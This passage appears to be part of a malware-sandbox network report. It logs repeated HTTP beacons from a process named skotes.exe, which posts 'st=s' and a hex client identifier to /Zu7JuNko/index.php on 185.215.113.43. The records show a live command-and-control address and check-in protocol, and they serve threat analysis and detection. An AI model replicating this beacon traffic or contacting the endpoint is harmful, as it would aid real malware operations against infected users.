                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:22.338610888 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:22 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                114192.168.2.450556185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:23.963581085 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:25.333132982 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                115192.168.2.450557185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:27.084832907 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:28.432076931 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                116192.168.2.450558185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:30.061661005 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:31.414516926 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                117192.168.2.450560185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:33.160512924 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:34.507376909 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:34 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                118192.168.2.450561185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:36.138401031 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:37.490405083 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                119192.168.2.450562185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:39.244210005 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:40.600100994 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                120192.168.2.450563185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:42.236790895 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:43.706929922 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                121192.168.2.450568185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:45.457930088 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:46.872647047 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                122192.168.2.450569185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:48.515064001 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:49.888931036 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:49 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                123192.168.2.450570185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:51.634366035 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:53.017009974 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:52 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                124192.168.2.450571185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:54.652048111 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:56.002546072 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:55 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                125192.168.2.450572185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:57.750787973 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:59.110794067 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:58 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                126192.168.2.450573185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:00.747033119 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:02.123616934 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:01 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                127192.168.2.450574185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:03.866005898 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:05.234178066 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:05 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                128192.168.2.450575185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:06.863102913 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:08.253911018 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                129192.168.2.450576185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:10.002778053 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:58:11.407399893 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:58:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                130192.168.2.450577185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
